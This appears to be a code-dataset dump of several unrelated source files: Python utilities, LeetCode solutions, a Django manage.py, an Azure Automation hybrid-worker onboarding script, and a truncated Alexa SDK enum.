hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a256e2861f9e5f69b0764bd1da15c3a4f122e6c | 5,804 | py | Python | optur/utils/sorted_trials.py | ytsmiling/optur | cbc56c60b322ea764592f01758798f745199b455 | [
"MIT"
] | 1 | 2022-01-19T09:18:15.000Z | 2022-01-19T09:18:15.000Z | optur/utils/sorted_trials.py | ytsmiling/optur | cbc56c60b322ea764592f01758798f745199b455 | [
"MIT"
] | null | null | null | optur/utils/sorted_trials.py | ytsmiling/optur | cbc56c60b322ea764592f01758798f745199b455 | [
"MIT"
] | null | null | null | import math
from typing import Callable, List, Optional, Sequence
from optur.proto.study_pb2 import Target, Trial
class TrialQualityFilter:
def __init__(self, *, filter_unknown: bool = True) -> None:
self._filter_unknown = filter_unknown
def __call__(self, trial: Trial) -> bool:
if self._filter_unknown and trial.last_known_state == Trial.State.UNKNOWN:
return False
return True
# Smaller is better.
class TrialKeyGenerator:
def __init__(self, targets: Sequence[Target]) -> None:
self._targets = targets
self._target_idx = -1
if (
sum(
target.direction in (Target.Direction.MAXIMIZE, Target.Direction.MINIMIZE)
for target in targets
)
== 1
):
for idx, target in enumerate(targets):
if target.direction in (Target.Direction.MAXIMIZE, Target.Direction.MINIMIZE):
self._target_idx = idx
@property
def is_valid(self) -> bool:
return self._target_idx >= 0
def __call__(self, trial: Trial) -> float:
assert self.is_valid
if trial.last_known_state != Trial.State.COMPLETED:
# TODO(tsuzuku): Check the value when it's PARTIALLY_COMPLETED.
return math.inf
if self._targets[self._target_idx].direction == Target.Direction.MINIMIZE:
return trial.values[self._target_idx].value
else:
return -trial.values[self._target_idx].value
# LQ, not LE.
# Fail < Partially Failed < Pruned < (Partially Complete, Complete)
# TODO(tsuzuku): This class is not tested yet.
class TrialComparator:
LQ_STATE = {
(Trial.State.FAILED, Trial.State.PARTIALLY_FAILED),
(Trial.State.FAILED, Trial.State.PRUNED),
(Trial.State.FAILED, Trial.State.PARTIALLY_COMPLETED),
(Trial.State.FAILED, Trial.State.COMPLETED),
(Trial.State.PARTIALLY_FAILED, Trial.State.PRUNED),
(Trial.State.PARTIALLY_FAILED, Trial.State.PARTIALLY_COMPLETED),
(Trial.State.PARTIALLY_FAILED, Trial.State.COMPLETED),
(Trial.State.PRUNED, Trial.State.PARTIALLY_COMPLETED),
(Trial.State.PRUNED, Trial.State.COMPLETED),
}
def __init__(self, targets: Sequence[Target]) -> None:
self._targets = targets
def __call__(self, a: Trial, b: Trial) -> bool:
if Trial.State.UNKNOWN in (a.last_known_state, b.last_known_state):
raise RuntimeError()
if a.last_known_state == b.last_known_state:
if a.last_known_state == Trial.State.COMPLETED:
raise NotImplementedError()
elif a.last_known_state == Trial.State.PARTIALLY_COMPLETED:
raise NotImplementedError()
return False
if (a.last_known_state, b.last_known_state) in self.LQ_STATE:
return True
# TODO(tsuzuku): Handle complete & Partially complete.
return False
class SortedTrials:
def __init__(
self,
trial_filter: Callable[[Trial], bool],
trial_key_generator: Optional[Callable[[Trial], float]],
trial_comparator: Optional[Callable[[Trial, Trial], bool]],
) -> None:
assert trial_key_generator is not None or trial_comparator is not None
self._trial_filter = trial_filter
self._trial_key_generator = trial_key_generator
self._trial_comparator = trial_comparator
self._sorted_trials: List[Trial] = []
if self._trial_key_generator is None:
raise NotImplementedError("Multi-objective is not supported yet.")
def sync(self, trials: Sequence[Trial]) -> None:
"""Update an internal data structure using the trials.
When there are duplicated trials, new trials replace old ones.
Let M be the number of trials and N be the length of this list before the sync.
In single-objective study, this operation takes O(Mlog(M) + N).
In multi-objective study, this operation takes O(M(M + N)).
"""
if not trials:
return
assert self._trial_key_generator is not None, "Only single objective is supported."
sorted_trials = list(
sorted(filter(self._trial_filter, trials), key=self._trial_key_generator)
)
new_trials = {trial.trial_id for trial in sorted_trials}
old_trials = [trial for trial in self._sorted_trials if trial.trial_id not in new_trials]
self._sorted_trials = self._merge_sorted_trials(
old_trials, sorted_trials, self._trial_key_generator
)
@staticmethod
def _merge_sorted_trials(
a: Sequence[Trial], b: Sequence[Trial], trial_key_generator: Callable[[Trial], float]
) -> List[Trial]:
ret: List[Trial] = []
a_idx = 0
b_idx = 0
while a_idx < len(a) and b_idx < len(b):
if trial_key_generator(a[a_idx]) < trial_key_generator(b[b_idx]):
ret.append(a[a_idx])
a_idx += 1
else:
ret.append(b[b_idx])
b_idx += 1
if a_idx == len(a):
ret.extend(b[b_idx:])
else:
ret.extend(a[a_idx:])
return ret
def to_list(self) -> List[Trial]:
"""Convert trials into a list.
Let N be the number of stored trials. Then, this operation takes at most O(N).
"""
assert self._trial_key_generator is not None, "Only single objective is supported."
return self._sorted_trials
def n_trials(self) -> int:
"""The number of stored trials."""
assert self._trial_key_generator is not None, "Only single objective is supported."
return len(self._sorted_trials)
def get_best_trials(self) -> List[Trial]:
pass
| 37.934641 | 97 | 0.634218 |
4a256eaff9bf2e9cfaea27f82b899bc93570419e | 506 | py | Python | app/airtable/attachment.py | WildflowerSchools/wf-airtable-api | 963021e5108462d33efa222fedb00890e1788ad6 | [
"MIT"
] | null | null | null | app/airtable/attachment.py | WildflowerSchools/wf-airtable-api | 963021e5108462d33efa222fedb00890e1788ad6 | [
"MIT"
] | null | null | null | app/airtable/attachment.py | WildflowerSchools/wf-airtable-api | 963021e5108462d33efa222fedb00890e1788ad6 | [
"MIT"
] | null | null | null | from typing import Dict, Optional
from pydantic import BaseModel, HttpUrl
class AirtableAttachmentThumbnailDetails(BaseModel):
url: HttpUrl
width: int
height: int
class AirtableAttachmentThumbnails(BaseModel):
__root__: Dict[str, AirtableAttachmentThumbnailDetails]
class AirtableAttachment(BaseModel):
id: str
width: Optional[int]
height: Optional[int]
url: HttpUrl
filename: str
size: int
type: str
thumbnails: Optional[AirtableAttachmentThumbnails]
| 21.083333 | 59 | 0.749012 |
4a256f09714ee78fae14e0756af07cca3fc68286 | 665 | py | Python | src/manage.py | PrashanjeetH/Django-Dynamic-filters | 7e957a9ca0bb2296199ffef0efd13653bedb58a3 | [
"MIT"
] | null | null | null | src/manage.py | PrashanjeetH/Django-Dynamic-filters | 7e957a9ca0bb2296199ffef0efd13653bedb58a3 | [
"MIT"
] | null | null | null | src/manage.py | PrashanjeetH/Django-Dynamic-filters | 7e957a9ca0bb2296199ffef0efd13653bedb58a3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjFilters.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.913043 | 73 | 0.679699 |
4a256f943aa8304d6b2f590446dcf70d70e9d802 | 1,445 | py | Python | tree/pathsum3.py | manikandan-ravikiran/Leetcode_August_Challenge | 739625ceea0b108b5bbf5fe190a668e798c23039 | [
"Apache-2.0"
] | null | null | null | tree/pathsum3.py | manikandan-ravikiran/Leetcode_August_Challenge | 739625ceea0b108b5bbf5fe190a668e798c23039 | [
"Apache-2.0"
] | null | null | null | tree/pathsum3.py | manikandan-ravikiran/Leetcode_August_Challenge | 739625ceea0b108b5bbf5fe190a668e798c23039 | [
"Apache-2.0"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def pathSum(self, root: TreeNode, sum: int) -> int:
def preorder(node: TreeNode, curr_sum) -> None:
nonlocal count
if not node:
return
# current prefix sum
curr_sum += node.val
# here is the sum we're looking for
if curr_sum == k:
count += 1
# number of times the curr_sum − k has occurred already,
# determines the number of times a path with sum k
# has occurred up to the current node
count += h[curr_sum - k]
# add the current sum into hashmap
# to use it during the child nodes processing
h[curr_sum] += 1
# process left subtree
preorder(node.left, curr_sum)
# process right subtree
preorder(node.right, curr_sum)
# remove the current sum from the hashmap
# in order not to use it during
# the parallel subtree processing
h[curr_sum] -= 1
count, k = 0, sum
h = defaultdict(int)
preorder(root, 0)
return count
| 32.840909 | 69 | 0.502422 |
4a25703eb0f37a8ea4f28ec74072e56e87c323f4 | 668 | py | Python | Algorithms/Strings/Pangrams.py | gelaim/HackerRank | 8b0e51d064a390f6112d54166942db440c88b579 | [
"MIT"
] | null | null | null | Algorithms/Strings/Pangrams.py | gelaim/HackerRank | 8b0e51d064a390f6112d54166942db440c88b579 | [
"MIT"
] | null | null | null | Algorithms/Strings/Pangrams.py | gelaim/HackerRank | 8b0e51d064a390f6112d54166942db440c88b579 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'pangrams' function below.
#
# The function is expected to return a STRING.
# The function accepts STRING s as parameter.
#
def pangrams(s):
# Write your code here
letters = set(x for x in 'abcdefghijklmnopqrstuvwxyz')
for i in s:
if i.lower() in letters:
letters.remove(i.lower())
if len(letters)==0:
return 'pangram'
return 'not pangram'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = pangrams(s)
fptr.write(result + '\n')
fptr.close()
| 18.555556 | 58 | 0.615269 |
4a257061c7e519913663649c2dc7c53461ede1fa | 20,899 | py | Python | Providers/nxOMSAutomationWorker/automationworker/scripts/onboarding.py | vtolao/PowerShell-DSC-for-Linux | c591267d82456e98c4cf854bd7d153ec2a7c8070 | [
"MIT"
] | 1 | 2019-04-17T14:45:48.000Z | 2019-04-17T14:45:48.000Z | Providers/nxOMSAutomationWorker/automationworker/scripts/onboarding.py | vtolao/PowerShell-DSC-for-Linux | c591267d82456e98c4cf854bd7d153ec2a7c8070 | [
"MIT"
] | null | null | null | Providers/nxOMSAutomationWorker/automationworker/scripts/onboarding.py | vtolao/PowerShell-DSC-for-Linux | c591267d82456e98c4cf854bd7d153ec2a7c8070 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
#
# Copyright (C) Microsoft Corporation, All rights reserved.
import ConfigParser
import base64
import datetime
import os
import re
import shutil
import socket
import subprocess
import sys
from optparse import OptionParser
# append worker binary source path
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from worker import configuration
from worker import httpclientfactory
from worker import linuxutil
from worker import serializerfactory
from worker import util
from worker import diydirs
json = serializerfactory.get_serializer(sys.version_info)
configuration.clear_config()
configuration.set_config({configuration.PROXY_CONFIGURATION_PATH: "/etc/opt/microsoft/omsagent/proxy.conf",
configuration.WORKER_VERSION: "LinuxDIYRegister",
configuration.WORKING_DIRECTORY_PATH: "/tmp"})
def get_ip_address():
try:
return socket.gethostbyname(socket.gethostname())
except:
return "127.0.0.1"
DIY_STATE_PATH = diydirs.DIY_STATE_PATH
DIY_WORKING_DIR = diydirs.DIY_WORKING_DIR
def generate_self_signed_certificate(certificate_path, key_path):
"""Creates a self-signed x509 certificate and key pair in the spcified path.
Args:
certificate_path : string, the output path of the certificate
key_path : string, the output path of the key
"""
cmd = ["openssl", "req", "-subj",
"/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=Azure Automation/CN=Hybrid Runbook Worker",
"-new", "-newkey", "rsa:2048", "-days", "365", "-nodes", "-x509", "-keyout", key_path, "-out",
certificate_path]
process, certificate_creation_output, error = linuxutil.popen_communicate(cmd)
if process.returncode != 0:
raise Exception("Unable to create certificate/key. " + str(error))
print "Certificate/Key created."
def sha256_digest(payload):
"""Sha256 digest of the specified payload.
Args:
payload : string, the payload to digest
Returns:
payload_hash : string, the sha256 hash of the payload
"""
cmd = ['echo -n "' + str(json.dumps(json.dumps(payload))) + '" | openssl dgst -sha256 -binary']
process, payload_hash, error = linuxutil.popen_communicate(cmd, shell=True)
if process.returncode != 0:
raise Exception("Unable to generate payload hash. " + str(error))
return payload_hash
def generate_hmac(str_to_sign, secret):
"""Signs the specified string using the specified secret.
Args:
str_to_sign : string, the string to sign
secret : string, the secret used to sign
Returns:
signed_message : string, the signed str_to_sign
"""
message = str_to_sign.encode('utf-8')
secret = secret.encode('utf-8')
cmd = ['echo -n "' + str(message) + '" | openssl dgst -sha256 -binary -hmac "' + str(secret) + '"']
process, signed_message, error = linuxutil.popen_communicate(cmd, shell=True)
if process.returncode != 0:
raise Exception("Unable to generate signature. " + str(error))
return signed_message
def create_worker_configuration_file(jrds_uri, automation_account_id, worker_group_name, machine_id,
working_directory_path, state_directory_path, cert_path, key_path,
registration_endpoint, workspace_id, thumbprint, vm_id, is_azure_vm,
gpg_keyring_path, test_mode):
"""Creates the automation hybrid worker configuration file.
Args:
jrds_uri : string, the jrds endpoint
automation_account_id : string, the automation account id
worker_group_name : string, the hybrid worker group name
machine_id : string, the machine id
working_directory_path : string, the hybrid worker working directory path
state_directory_path : string, the state directory path
cert_path : string, the the certificate path
key_path : string, the key path
registration_endpoint : string, the registration endpoint
workspace_id : string, the workspace id
thumbprint : string, the certificate thumbprint
is_azure_vm : bool, whether the VM is hosted in Azure
gpg_keyring_path : string, path to the gpg keyring for verifying runbook signatures
test_mode : bool, test mode
Note:
The generated file has to match the latest worker.conf template.
"""
worker_conf_path = os.path.join(state_directory_path, "worker.conf")
config = ConfigParser.ConfigParser()
if os.path.isfile(worker_conf_path):
config.read(worker_conf_path)
conf_file = open(worker_conf_path, 'wb')
worker_required_section = configuration.WORKER_REQUIRED_CONFIG_SECTION
if not config.has_section(worker_required_section):
config.add_section(worker_required_section)
config.set(worker_required_section, configuration.CERT_PATH, cert_path)
config.set(worker_required_section, configuration.KEY_PATH, key_path)
config.set(worker_required_section, configuration.BASE_URI, jrds_uri)
config.set(worker_required_section, configuration.ACCOUNT_ID, automation_account_id)
config.set(worker_required_section, configuration.MACHINE_ID, machine_id)
config.set(worker_required_section, configuration.HYBRID_WORKER_GROUP_NAME, worker_group_name)
config.set(worker_required_section, configuration.WORKING_DIRECTORY_PATH, working_directory_path)
worker_optional_section = configuration.WORKER_OPTIONAL_CONFIG_SECTION
if not config.has_section(worker_optional_section):
config.add_section(worker_optional_section)
config.set(worker_optional_section, configuration.PROXY_CONFIGURATION_PATH,
"/etc/opt/microsoft/omsagent/proxy.conf")
config.set(worker_optional_section, configuration.STATE_DIRECTORY_PATH, state_directory_path)
if gpg_keyring_path is not None:
config.set(worker_optional_section, configuration.GPG_PUBLIC_KEYRING_PATH, gpg_keyring_path)
if test_mode is True:
config.set(worker_optional_section, configuration.BYPASS_CERTIFICATE_VERIFICATION, True)
config.set(worker_optional_section, configuration.DEBUG_TRACES, True)
metadata_section = configuration.METADATA_CONFIG_SECTION
if not config.has_section(metadata_section):
config.add_section(metadata_section)
config.set(metadata_section, configuration.WORKER_TYPE, "diy")
config.set(metadata_section, configuration.IS_AZURE_VM, str(is_azure_vm))
config.set(metadata_section, configuration.VM_ID, vm_id)
registration_metadata_section = "registration-metadata"
if not config.has_section(registration_metadata_section):
config.add_section(registration_metadata_section)
config.set(registration_metadata_section, configuration.REGISTRATION_ENDPOINT, registration_endpoint)
config.set(registration_metadata_section, configuration.WORKSPACE_ID, workspace_id)
config.set(registration_metadata_section, configuration.CERTIFICATE_THUMBPRINT, thumbprint)
config.write(conf_file)
conf_file.close()
def get_autoregistered_worker_account_id():
autoregistered_worker_conf_path = "/var/opt/microsoft/omsagent/state/automationworker/worker.conf"
config = ConfigParser.ConfigParser()
if os.path.isfile(autoregistered_worker_conf_path) is False:
print "No diy worker found. Account validation skipped."
return None
config.read(autoregistered_worker_conf_path)
account_id = config.get("worker-required", "account_id")
print "Found existing worker for account id : " + str(account_id)
return account_id
def extract_account_id_from_registration_endpoint(registration_endpoint):
account_id = re.findall("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}",
registration_endpoint.lower())
if len(account_id) != 1:
raise Exception("Invalid registration endpoint format.")
return account_id[0]
def invoke_dmidecode():
"""Gets the dmidecode output from the host."""
proc = subprocess.Popen(["su", "-", "root", "-c", "dmidecode"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
dmidecode, error = proc.communicate()
if proc.poll() != 0:
raise Exception("Unable to get dmidecode output : " + str(error))
return dmidecode
def register(options):
"""Registers the machine against the automation agent service.
Args:
options : dict, the options dictionary
"""
registration_endpoint = options.registration_endpoint
automation_account_key = options.automation_account_key
hybrid_worker_group_name = options.hybrid_worker_group_name
workspace_id = options.workspace_id
# assert workspace exists on the box
state_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/state/"
working_directory_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/run/"
if os.path.exists(state_base_path) is False or os.path.exists(working_directory_base_path) is False:
raise Exception("Invalid workspace id. Is the specified workspace id registered as the OMSAgent "
"primary worksapce?")
diy_account_id = extract_account_id_from_registration_endpoint(registration_endpoint)
auto_registered_account_id = get_autoregistered_worker_account_id()
if auto_registered_account_id != None and auto_registered_account_id != diy_account_id:
raise Exception("Cannot register, conflicting worker already registered.")
worker_conf_path = os.path.join(DIY_STATE_PATH, "worker.conf")
if os.path.isfile(worker_conf_path) is True:
raise Exception("Unable to register, an existing worker was found. Please deregister any existing worker and "
"try again.")
certificate_path = os.path.join(DIY_STATE_PATH, "worker_diy.crt")
key_path = os.path.join(DIY_STATE_PATH, "worker_diy.key")
machine_id = util.generate_uuid()
# generate state path (certs/conf will be dropped in this path)
if os.path.isdir(DIY_STATE_PATH) is False:
os.makedirs(DIY_STATE_PATH)
generate_self_signed_certificate(certificate_path=certificate_path, key_path=key_path)
issuer, subject, thumbprint = linuxutil.get_cert_info(certificate_path)
# try to extract optional metadata
unknown = "Unknown"
asset_tag = unknown
vm_id = unknown
is_azure_vm = False
try:
dmidecode = invoke_dmidecode()
is_azure_vm = linuxutil.is_azure_vm(dmidecode)
if is_azure_vm:
asset_tag = linuxutil.get_azure_vm_asset_tag()
else:
asset_tag = False
vm_id = linuxutil.get_vm_unique_id_from_dmidecode(sys.byteorder, dmidecode)
except Exception, e:
print str(e)
pass
# generate payload for registration request
date = datetime.datetime.utcnow().isoformat() + "0-00:00"
payload = {'RunbookWorkerGroup': hybrid_worker_group_name,
"MachineName": socket.gethostname().split(".")[0],
"IpAddress": get_ip_address(),
"Thumbprint": thumbprint,
"Issuer": issuer,
"OperatingSystem": 2,
"SMBIOSAssetTag": asset_tag,
"VirtualMachineId": vm_id,
"Subject": subject}
# the signature generation is based on agent service contract
payload_hash = sha256_digest(payload)
b64encoded_payload_hash = base64.b64encode(payload_hash)
signature = generate_hmac(b64encoded_payload_hash + "\n" + date, automation_account_key)
b64encoded_signature = base64.b64encode(signature)
headers = {'Authorization': 'Shared ' + b64encoded_signature,
'ProtocolVersion': "2.0",
'x-ms-date': date,
"Content-Type": "application/json"}
# agent service registration request
http_client_factory = httpclientfactory.HttpClientFactory(certificate_path, key_path, options.test)
http_client = http_client_factory.create_http_client(sys.version_info)
url = registration_endpoint + "/HybridV2(MachineId='" + machine_id + "')"
response = http_client.put(url, headers=headers, data=payload)
if response.status_code != 200:
raise Exception("Failed to register worker. [response_status=" + str(response.status_code) + "]")
registration_response = json.loads(response.raw_data)
account_id = registration_response["AccountId"]
create_worker_configuration_file(registration_response["jobRuntimeDataServiceUri"], account_id,
hybrid_worker_group_name, machine_id, DIY_WORKING_DIR,
DIY_STATE_PATH, certificate_path, key_path, registration_endpoint,
workspace_id, thumbprint, vm_id, is_azure_vm, options.gpg_keyring, options.test)
# generate working directory path
diydirs.create_persistent_diy_dirs()
print "Registration successful!"
def deregister(options):
registration_endpoint = options.registration_endpoint
automation_account_key = options.automation_account_key
workspace_id = options.workspace_id
# assert workspace exists on the box
state_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/state/"
working_directory_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/run/"
if os.path.exists(state_base_path) is False or os.path.exists(working_directory_base_path) is False:
raise Exception("Invalid workspace id. Is the specified workspace id registered as the OMSAgent "
"primary worksapce?")
worker_conf_path = os.path.join(DIY_STATE_PATH, "worker.conf")
certificate_path = os.path.join(DIY_STATE_PATH, "worker_diy.crt")
key_path = os.path.join(DIY_STATE_PATH, "worker_diy.key")
if os.path.exists(worker_conf_path) is False:
raise Exception("Unable to deregister, no worker configuration found on disk.")
if os.path.exists(certificate_path) is False or os.path.exists(key_path) is False:
raise Exception("Unable to deregister, no worker certificate/key found on disk.")
issuer, subject, thumbprint = linuxutil.get_cert_info(certificate_path)
if os.path.exists(worker_conf_path) is False:
raise Exception("Missing worker configuration.")
if os.path.exists(certificate_path) is False:
raise Exception("Missing worker certificate.")
if os.path.exists(key_path) is False:
raise Exception("Missing worker key.")
config = ConfigParser.ConfigParser()
config.read(worker_conf_path)
machine_id = config.get("worker-required", "machine_id")
# generate payload for registration request
date = datetime.datetime.utcnow().isoformat() + "0-00:00"
payload = {"Thumbprint": thumbprint,
"Issuer": issuer,
"Subject": subject}
# the signature generation is based on agent service contract
payload_hash = sha256_digest(payload)
b64encoded_payload_hash = base64.b64encode(payload_hash)
signature = generate_hmac(b64encoded_payload_hash + "\n" + date, automation_account_key)
b64encoded_signature = base64.b64encode(signature)
headers = {'Authorization': 'Shared ' + b64encoded_signature,
'ProtocolVersion': "2.0",
'x-ms-date': date,
"Content-Type": "application/json"}
# agent service registration request
http_client_factory = httpclientfactory.HttpClientFactory(certificate_path, key_path, options.test)
http_client = http_client_factory.create_http_client(sys.version_info)
url = registration_endpoint + "/Hybrid(MachineId='" + machine_id + "')"
response = http_client.delete(url, headers=headers, data=payload)
if response.status_code != 200:
raise Exception("Failed to deregister worker. [response_status=" + str(response.status_code) + "]")
if response.status_code == 404:
raise Exception("Unable to deregister. Worker not found.")
print "Successfuly deregistered worker."
print "Cleaning up left over directories."
try:
shutil.rmtree(DIY_STATE_PATH)
print "Removed state directory."
except:
raise Exception("Unable to remove state directory base path.")
try:
shutil.rmtree(DIY_WORKING_DIR)
print "Removed working directory."
except:
raise Exception("Unable to remove working directory base path.")
def environment_prerequisite_validation():
"""Validates that basic environment requirements are met for the onboarding operations."""
nxautomation_username = "nxautomation"
if linuxutil.is_existing_user(nxautomation_username) is False:
raise Exception("Missing user : " + nxautomation_username + ". Are you running the lastest OMSAgent version?")
omsagent_username = "omsagent"
if linuxutil.is_existing_user(omsagent_username) is False:
raise Exception("Missing user : " + omsagent_username + ".")
omiusers_group_name = "omiusers"
if linuxutil.is_existing_group(omiusers_group_name) is False:
raise Exception("Missing group : " + omiusers_group_name + ".")
nxautomation_group_name = "nxautomation"
if linuxutil.is_existing_group(omiusers_group_name) is False:
raise Exception("Missing group : " + nxautomation_group_name + ".")
def get_options_and_arguments():
parser = OptionParser(
usage="usage: %prog [--register, --deregister] -e endpoint -k key -g groupname -w workspaceid [-p gpgkeyring]",
version="%prog " + str(configuration.get_worker_version()))
parser.add_option("-e", "--endpoint", dest="registration_endpoint", help="Agent service registration endpoint.")
parser.add_option("-k", "--key", dest="automation_account_key", help="Automation account primary/secondary key.")
parser.add_option("-g", "--groupname", dest="hybrid_worker_group_name", help="Hybrid worker group name.")
parser.add_option("-w", "--workspaceid", dest="workspace_id", help="Workspace id.")
parser.add_option("-r", "--register", action="store_true", dest="register", default=False)
parser.add_option("-d", "--deregister", action="store_true", dest="deregister", default=False)
parser.add_option("-t", "--test", action="store_true", dest="test", default=False)
parser.add_option("-p", "--gpg-keyring", dest="gpg_keyring", help="GPG keyring path")
(options, args) = parser.parse_args()
if options.register is False and options.deregister is False:
raise Exception("Please specify the onboarding action to perform (--register | --deregister).")
# --register requirements
if options.register is True and (options.registration_endpoint is not None
and options.automation_account_key is not None
and options.hybrid_worker_group_name is not None
and options.workspace_id is not None) is False:
parser.print_help()
sys.exit(-1)
# --deregister requirements
elif options.deregister is True and (options.registration_endpoint is not None
and options.automation_account_key is not None
and options.hybrid_worker_group_name is not None
and options.workspace_id is not None) is False:
parser.print_help()
sys.exit(-1)
elif options.register is False and options.deregister is False:
parser.print_help()
sys.exit(-1)
return options, args
def main():
options, args = get_options_and_arguments()
environment_prerequisite_validation()
if options.register is True:
register(options)
elif options.deregister is True:
deregister(options)
if __name__ == "__main__":
# is running as root
if os.getuid() != 0:
raise Exception("You need to run this script as root to register a new automation worker.")
# requied for cases where the diy registration is trigger before the worker manager start (.pyc will be owned by root in that case and have to be owned by omsagent:omiusers)
proc = subprocess.Popen(["find",
"/opt/microsoft/omsconfig/modules/nxOMSAutomationWorker/DSCResources/MSFT_nxOMSAutomationWorkerResource/automationworker/",
"-type", "f", "-name", "*.pyc", "-exec", "rm", "{}", "+"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, error = proc.communicate()
if proc.returncode != 0:
raise Exception("Unable to remove root-owned .pyc")
main()
| 44.847639 | 177 | 0.698646 |
4a2570c33ff0beb34fbb919cea6b3ae21c53ead5 | 1,618 | py | Python | leetcode-algorithms/237. Delete Node in a Linked List/237.delete-node-in-a-linked-list.py | cnyy7/LeetCode_EY | 44e92f102b61f5e931e66081ed6636d7ecbdefd4 | [
"MIT"
] | null | null | null | leetcode-algorithms/237. Delete Node in a Linked List/237.delete-node-in-a-linked-list.py | cnyy7/LeetCode_EY | 44e92f102b61f5e931e66081ed6636d7ecbdefd4 | [
"MIT"
] | null | null | null | leetcode-algorithms/237. Delete Node in a Linked List/237.delete-node-in-a-linked-list.py | cnyy7/LeetCode_EY | 44e92f102b61f5e931e66081ed6636d7ecbdefd4 | [
"MIT"
] | null | null | null | #
# @lc app=leetcode id=237 lang=python3
#
# [237] Delete Node in a Linked List
#
# https://leetcode.com/problems/delete-node-in-a-linked-list/description/
#
# algorithms
# Easy (53.89%)
# Likes: 834
# Dislikes: 3998
# Total Accepted: 305.5K
# Total Submissions: 556.4K
# Testcase Example: '[4,5,1,9]\n5'
#
# Write a function to delete a node (except the tail) in a singly linked list,
# given only access to that node.
#
# Given linked list -- head = [4,5,1,9], which looks like following:
#
#
#
#
#
# Example 1:
#
#
# Input: head = [4,5,1,9], node = 5
# Output: [4,1,9]
# Explanation: You are given the second node with value 5, the linked list
# should become 4 -> 1 -> 9 after calling your function.
#
#
# Example 2:
#
#
# Input: head = [4,5,1,9], node = 1
# Output: [4,5,9]
# Explanation: You are given the third node with value 1, the linked list
# should become 4 -> 5 -> 9 after calling your function.
#
#
#
#
# Note:
#
#
# The linked list will have at least two elements.
# All of the nodes' values will be unique.
# The given node will not be the tail and it will always be a valid node of the
# linked list.
# Do not return anything from your function.
#
#
#
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def deleteNode(self, node):
"""
:type node: ListNode
:rtype: void Do not return anything, modify node in-place instead.
"""
node.val, node.next = node.next.val, node.next.next
| 23.114286 | 80 | 0.618665 |
4a2570e11de2589db4dfa6648978d1efe98c325e | 1,810 | py | Python | env/lib/python3.8/site-packages/ask_sdk_model/permission_status.py | adamash99/alexa-play-pot-of-greed | dc2d18dae55692a4bf1becb72685a5777870c643 | [
"MIT"
] | 90 | 2018-09-19T21:56:42.000Z | 2022-03-30T11:25:21.000Z | ask-sdk-model/ask_sdk_model/permission_status.py | ishitaojha/alexa-apis-for-python | a68f94b7a0e41f819595d6fe56e800403e8a4194 | [
"Apache-2.0"
] | 11 | 2018-09-23T12:16:48.000Z | 2021-06-10T19:49:45.000Z | ask-sdk-model/ask_sdk_model/permission_status.py | ishitaojha/alexa-apis-for-python | a68f94b7a0e41f819595d6fe56e800403e8a4194 | [
"Apache-2.0"
] | 28 | 2018-09-19T22:30:38.000Z | 2022-02-22T22:57:07.000Z | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union, Any
from datetime import datetime
class PermissionStatus(Enum):
"""
This denotes the status of the permission scope.
Allowed enum values: [GRANTED, DENIED]
"""
GRANTED = "GRANTED"
DENIED = "DENIED"
def to_dict(self):
